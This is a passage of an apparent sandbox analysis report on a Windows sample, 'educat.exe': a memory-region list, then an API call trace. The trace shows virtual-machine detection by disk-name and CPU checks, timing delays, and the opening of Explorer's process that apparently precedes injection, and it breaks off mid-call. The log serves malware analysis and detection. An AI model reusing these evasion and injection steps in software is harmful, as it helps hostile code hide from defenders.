0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 218 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 219 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 220 start_va = 0x7fff0000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 221 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 222 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 229 start_va = 0x400000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 237 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 238 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 239 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 240 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 241 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 242 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 243 start_va = 0x1e0000 end_va = 0x29dfff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 244 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 245 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 246 start_va = 0x630000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 247 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 248 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 249 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 250 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 251 start_va = 0x75220000 end_va = 0x75255fff entry_point = 0x75220000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 252 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 253 start_va = 0x753b0000 end_va = 0x753f3fff entry_point = 0x753b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 254 start_va = 0x75430000 end_va = 0x767eefff entry_point = 0x75430000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 255 start_va = 0x76810000 end_va = 0x7681efff entry_point = 0x76810000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 256 start_va = 0x768b0000 end_va = 0x76999fff entry_point = 0x768b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 257 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 258 start_va = 0x76a90000 end_va = 0x76c34fff entry_point = 0x76a90000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 259 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 260 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 261 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 262 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 263 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 264 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 265 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 266 start_va = 0x773f0000 end_va = 0x778ccfff entry_point = 0x773f0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 267 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 268 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 269 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 270 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 272 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 273 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 274 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 275 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 276 start_va = 0x730000 end_va = 0x8b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 277 start_va = 0x8c0000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 278 start_va = 0xa50000 end_va = 0x1e4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 279 start_va = 0x1e50000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 280 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 281 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 282 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 284 start_va = 0x1f50000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 285 start_va = 0x74b20000 end_va = 0x74b40fff entry_point = 0x74b20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 286 start_va = 0x2370000 end_va = 0x26a6fff entry_point = 0x2370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 287 start_va = 0x76d40000 end_va = 0x76d81fff entry_point = 0x76d40000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 288 start_va = 0x76d30000 end_va = 0x76d3dfff entry_point = 0x76d30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 289 start_va = 0x77ab0000 end_va = 0x77c24fff entry_point = 0x77ab0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 290 start_va = 0x60000 end_va = 0x12efff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 291 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 292 start_va = 0x74c20000 end_va = 0x74c94fff entry_point = 0x74c20000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 293 start_va = 0x4c0000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 294 start_va = 0x749d0000 end_va = 0x74b11fff entry_point = 0x749d0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 295 start_va = 0x76c90000 end_va = 0x76d21fff entry_point = 0x76c90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 296 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 297 start_va = 0x76820000 end_va = 0x768a1fff entry_point = 0x76820000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 298 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 299 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 300 start_va = 0x4c0000 end_va = 0x502fff entry_point = 0x4c0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 301 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 302 start_va = 0x170000 end_va = 0x173fff entry_point = 0x170000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 303 start_va = 0x580000 end_va = 0x60afff entry_point = 0x580000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 304 start_va = 0x180000 end_va = 0x190fff entry_point = 0x180000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 305 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x3f0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 306 start_va = 0x510000 end_va = 0x522fff entry_point = 0x510000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 307 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 308 start_va = 0x26b0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 309 start_va = 0x26f0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 310 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 311 start_va = 0x74be0000 end_va = 0x74bf2fff entry_point = 0x74be0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 312 start_va = 0x27f0000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 313 start_va = 0x2830000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 314 start_va = 0x74bc0000 end_va = 0x74bdafff entry_point = 0x74bc0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 315 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 316 start_va = 0x74b90000 end_va = 0x74bbefff entry_point = 0x74b90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 317 start_va = 0x2930000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 318 start_va = 0x2970000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 319 start_va = 0x2a70000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 320 start_va = 0x2ab0000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 321 start_va = 0x2bb0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 322 start_va = 0x2bf0000 end_va = 0x2ceffff entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 323 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 324 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 325 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 326 start_va = 0x74870000 end_va = 0x749cffff entry_point = 0x74870000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 327 start_va = 0x745a0000 end_va = 0x74860fff entry_point = 0x745a0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 328 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 329 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Thread: id = 3 os_tid = 0xda8 [0048.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401646, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x174 [0048.473] CloseHandle (hObject=0x174) returned 1 [0048.473] RtlExitUserThread (Status=0x0) Thread: id = 4 os_tid = 0xdb0 Thread: id = 5 os_tid = 0xdb4 [0048.562] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0048.562] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" " [0048.562] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0048.562] GetComputerNameA (in: lpBuffer=0x1f4fcc4, nSize=0x1f4fd50 | out: lpBuffer="LHNIWSJ", nSize=0x1f4fd50) returned 1 [0048.562] lstrlenA (lpString="LHNIWSJ") returned 7 [0048.562] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x1f4fd48 | out: phkResult=0x1f4fd48*=0xc4) returned 0x0 [0048.562] RegQueryValueExA (in: hKey=0xc4, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x1f4fd44, lpcbData=0x1f4fd50*=0x4 | out: lpType=0x0, lpData=0x1f4fd44*=0x41, lpcbData=0x1f4fd50*=0x4) returned 0x0 [0048.562] RegCloseKey (hKey=0xc4) returned 0x0 [0048.562] wsprintfA (in: param_1=0x1f4fea8, param_2="%8X" | out: param_1="98F9CE91") returned 8 [0048.562] GetTempPathA (in: nBufferLength=0x100, lpBuffer=0x1f4fda8 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0048.562] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpString2="98F9CE91" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" [0048.563] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 45 [0048.563] mbstowcs (in: _Dest=0x23585a8, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", _MaxCount=0x2e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2d [0048.563] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2e [0048.563] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x2358610, nSize=0x2e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2e [0048.563] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\98f9ce91"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.563] GetLastError () returned 0x2 [0048.564] wsprintfA (in: param_1=0x1f4feb4, param_2="%c%c%c%c" | out: param_1="Inte") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4feb8, param_2="%c%c%c%c" | out: param_1="l (R") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4febc, param_2="%c%c%c%c" | out: param_1=") Co") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fec0, param_2="%c%c%c%c" | out: param_1="re(T") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fec4, param_2="%c%c%c%c" | out: param_1="M) i") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fec8, param_2="%c%c%c%c" | out: param_1="5-75") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fecc, param_2="%c%c%c%c" | out: param_1="00 C") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fed0, param_2="%c%c%c%c" | out: param_1="PU @") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fed4, param_2="%c%c%c%c" | out: param_1=" 3.4") returned 4 [0048.564] wsprintfA (in: param_1=0x1f4fed8, param_2="%c%c%c%c" | out: param_1="0GHz") returned 4 [0048.565] wsprintfA (in: param_1=0x1f4fedc, param_2="%c%c%c%c" | out: param_1="") returned 4 [0048.565] wsprintfA (in: param_1=0x1f4fee0, param_2="%c%c%c%c" | out: param_1="") returned 4 [0048.565] strstr (_Str="INTEL (R) CORE(TM) I5-7500 CPU @ 3.40GHZ", _SubStr="XEON") returned 0x0 [0048.565] SetupDiGetClassDevsA (ClassGuid=0x1f4fe90*(Data1=0x4d36e967, Data2=0xe325, Data3=0x11ce, Data4=([0]=0xbf, [1]=0xc1, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0xe1, [6]=0x3, [7]=0x18)), Enumerator=0x0, hwndParent=0x0, Flags=0x2) returned 0x638680 [0048.862] SetupDiEnumDeviceInfo (in: DeviceInfoSet=0x638680, MemberIndex=0x0, DeviceInfoData=0x1f4fea0 | out: DeviceInfoData=0x1f4fea0) returned 1 [0048.862] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x638680, DeviceInfoData=0x1f4fea0, Property=0xc, PropertyRegDataType=0x1f4fec8, PropertyBuffer=0x0, PropertyBufferSize=0x0, RequiredSize=0x1f4feec | out: PropertyRegDataType=0x1f4fec8, PropertyBuffer=0x0, RequiredSize=0x1f4feec) returned 0 [0048.862] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x638680, DeviceInfoData=0x1f4fea0, Property=0xc, PropertyRegDataType=0x1f4fec8, PropertyBuffer=0x2358618, PropertyBufferSize=0xb, RequiredSize=0x1f4feec | out: PropertyRegDataType=0x1f4fec8, PropertyBuffer=0x2358618, RequiredSize=0x1f4feec) returned 1 [0048.863] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vbox") returned 0x0 [0048.869] StrStrIA (lpFirst="WD5000AVDS", lpSrch="qemu") returned 0x0 [0048.869] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vmware") returned 0x0 [0048.869] StrStrIA (lpFirst="WD5000AVDS", lpSrch="virtual hd") returned 0x0 [0048.869] SetupDiDestroyDeviceInfoList (DeviceInfoSet=0x638680) returned 1 [0049.966] GetTickCount () returned 0x1fc8b [0049.966] Sleep (dwMilliseconds=0x1f4) [0050.480] Sleep (dwMilliseconds=0x1f4) [0051.055] Sleep (dwMilliseconds=0x1f4) [0051.595] Sleep (dwMilliseconds=0x1f4) [0052.105] Sleep (dwMilliseconds=0x1f4) [0052.613] Sleep (dwMilliseconds=0x1f4) [0053.118] Sleep (dwMilliseconds=0x1f4) [0053.690] Sleep (dwMilliseconds=0x1f4) [0054.197] Sleep (dwMilliseconds=0x1f4) [0054.715] Sleep (dwMilliseconds=0x1f4) [0055.228] SwitchToThread () returned 1 [0055.243] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.244] SwitchToThread () returned 1 [0055.259] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.259] SwitchToThread () returned 1 [0055.275] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.275] SwitchToThread () returned 1 [0055.290] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.290] SwitchToThread () returned 1 [0055.306] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.306] SwitchToThread () returned 1 [0055.321] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.322] SwitchToThread () returned 1 [0055.337] lstrcpynA (in: lpString1=0x1f4fecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0055.337] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0055.337] GetVersion () returned 0x23f00206 [0055.337] GetCurrentProcessId () returned 0xda4 [0055.337] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc4 [0055.337] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x23585a8, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe")) returned 0x28 [0055.337] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe", lpszLongPath=0x0, cchBuffer=0x0 | out: lpszLongPath=0x0) returned 0x29 [0055.338] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe", lpszLongPath=0x23587b8, cchBuffer=0x29 | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned 0x28 [0055.339] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0055.339] GetProcAddress (hModule=0x75260000, lpProcName="IsWow64Process") returned 0x752796e0 [0055.339] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1f4fee8 | out: Wow64Process=0x1f4fee8) returned 1 [0055.339] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77150000 [0055.339] GetProcAddress (hModule=0x77150000, lpProcName="GetWindowThreadProcessId") returned 0x7716ba70 [0055.339] FindWindowA (lpClassName="ProgMan", lpWindowName=0x0) returned 0x100c8 [0055.339] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0x1f4feec | out: lpdwProcessId=0x1f4feec) returned 0x55c [0055.339] NtOpenProcess (in: ProcessHandle=0x1f4fee0, DesiredAccess=0x400, ObjectAttributes=0x1f4fec0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, 